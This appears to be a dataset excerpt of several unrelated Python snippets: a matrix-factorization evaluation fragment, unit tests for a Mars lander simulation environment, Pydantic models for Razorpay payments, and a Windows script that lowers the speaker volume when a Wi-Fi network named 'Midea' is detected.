predictedMatrix = AMF.predict(trainMatrix, U, S, p, q, para)
runningTime = float(time.clock() - startTime)
# evaluate the estimation error
predVec = predictedMatrix[testVecX, testVecY]
predVec = (maxV - minV) * predVec + minV
predVec = evallib.argBoxcox(predVec, alpha)
evalResult = evallib.errMetric(testVec, predVec, para['metrics'])
result = (evalResult, runningTime)
# dump the result at each density
outFile = '%s%s_%s_result_%02d_%.2f_round%02d.tmp'%(para['outPath'],
para['dataName'], para['dataType'], sliceId + 1, density, roundId + 1)
evallib.dumpresult(outFile, result)
logger.info('sliceId=%02d done.'%(sliceId + 1))
logger.info('density=%.2f, %2d-round done.'%(density, roundId + 1))
logger.info('----------------------------------------------')
| StarcoderdataPython |
1762728 | import unittest
import numpy as np
from lander.environment import MarsLanderEnv
class MarsLanderEnvTest(unittest.TestCase):
def test_detection_landing_area(self):
# https://www.codingame.com/ide/puzzle/mars-lander - Initial speed, correct side
ground = np.array(
[
[0, 100],
[1000, 500],
[1500, 100],
[3000, 100],
[3500, 100],
[3700, 200],
[5000, 1500],
[5800, 100],
[6000, 120],
[6999, 2000],
]
)
# Test detection of landing area
env = MarsLanderEnv(ground=ground)
assert env.landing_area == [6, 11]
def test_correct_physic(self):
# https://www.codingame.com/ide/puzzle/mars-lander - Initial speed, correct side
init_state = tuple(dict(x=6500, y=2800, vx=-100, vy=0, fuel=600, angle=90, power=0).values())
env = MarsLanderEnv(init_state)
for i in range(3):
state = env.update_state(-15, 1)
for i in range(4):
state = env.update_state(-15, 0)
state = env.update_state(-5, 0)
for i in range(60):
state = env.update_state(0, 0)
np.testing.assert_array_equal(np.rint(state), [1191, 405, -44, -66, 399, -20, 3])
def test_collision(self):
# https://www.codingame.com/ide/puzzle/mars-lander - Initial speed, correct side
initial_state = tuple(dict(x=6500, y=2800, vx=-100, vy=0, fuel=600, angle=90, power=0).values())
ground = np.array(
[
[0, 100],
[1000, 500],
[1500, 100],
[3000, 100],
[3500, 100],
[3700, 200],
[5000, 1500],
[5800, 100],
[6000, 120],
[6999, 2000],
]
)
env = MarsLanderEnv(initial_state, ground)
for i in range(70):
state, reward, done, info = env.step([-1, 1])
if done:
break
self.assertEqual(i, 39)
self.assertLess(reward, 0)
def test_rover_exits_field_of_view(self):
# https://www.codingame.com/ide/puzzle/mars-lander - Initial speed, correct side
initial_state = tuple(dict(x=6500, y=2800, vx=-100, vy=0, fuel=600, angle=90, power=0).values())
ground = np.array(
[
[0, 100],
[1000, 500],
[1500, 100],
[3000, 100],
[3500, 100],
[3700, 200],
[5000, 1500],
[5800, 100],
[6000, 120],
[6999, 2000],
]
)
env = MarsLanderEnv(initial_state, ground)
for i in range(6):
state, reward, done, info = env.step([-1, 1])
for i in range(64):
state, reward, done, info = env.step([0, 0])
if done:
break
self.assertEqual(i, 54)
self.assertLess(reward, 0)
def test_successful_landing(self):
# https://www.codingame.com/ide/puzzle/mars-lander-episode-1 - Straight landing
initial_state = tuple(dict(x=2500, y=2500, vx=0, vy=0, fuel=500, angle=0, power=0).values())
ground = np.array(
[
[0, 100],
[1000, 500],
[1500, 100],
[3000, 100],
[5000, 1500],
[6999, 1000],
]
)
env = MarsLanderEnv(rover=initial_state, ground=ground)
# Boost speed to max
env.step([0, 1])
env.step([0, 1])
env.step([0, 1])
env.step([0, 1])
for i in range(70):
state, reward, done, info = env.step([0, -1])
if done:
break
state, reward, done, info = env.step([0, 1])
self.assertEqual(i, 64)
self.assertGreater(reward, 0)
if __name__ == "__main__":
unittest.main()
| StarcoderdataPython |
1782451 | <reponame>sakthiRathinam/fastapicorenew
from uuid import UUID
from pydantic import BaseModel
from typing import List, Optional
from .models import RazorPayPlans
class RazorData(BaseModel):
razorpay_order_id:str
razorpay_payment_id: str
razorpay_signature: str
error: Optional[bool] = False
class CreateMonthlyPlan(BaseModel):
amount: int
title: str
discount_percent: Optional[int] = 0
number_of_months: Optional[int] = 1
class CreateRazorPayment(BaseModel):
clinic_id: int
user_id:int
selected_plan:int
| StarcoderdataPython |
3363487 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2020/4/14 上午 10:26
# @File : run.py
# @Software: PyCharm
# @Author : LiTian
import subprocess
import ctypes
# Simulate pressing the volume-down media key to lower the speaker volume
def set_speaker_vol(num):
WM_APPCOMMAND = 0x319
APPCOMMAND_VOLUME_UP = 0x0a
APPCOMMAND_VOLUME_DOWN = 0x09
APPCOMMAND_VOLUME_MUTE = 0x08
hwnd = ctypes.windll.user32.GetForegroundWindow()
ctypes.windll.winmm.waveOutSetVolume(hwnd, 0xffffffff)
for i in range(num):
ctypes.windll.user32.PostMessageA(hwnd, WM_APPCOMMAND, 0, APPCOMMAND_VOLUME_DOWN * 0x10000)
# Use the Windows command "netsh wlan show network" to get the list of detected Wi-Fi networks
def get_wifi_list():
result = subprocess.check_output(['netsh', 'wlan', 'show', 'network'])
result = result.decode('gbk')
lst = result.split('\r\n')
    # Parse the command output to collect the Wi-Fi SSID names
wifi_name = []
for s in lst:
if 'SSID' in s:
wifi_name.append(s.split(':')[1].strip())
return wifi_name
if __name__ == '__main__':
wifi_name = 'Midea'
wifi_name_list = get_wifi_list()
if wifi_name in wifi_name_list:
print(wifi_name)
set_speaker_vol(50)
| StarcoderdataPython |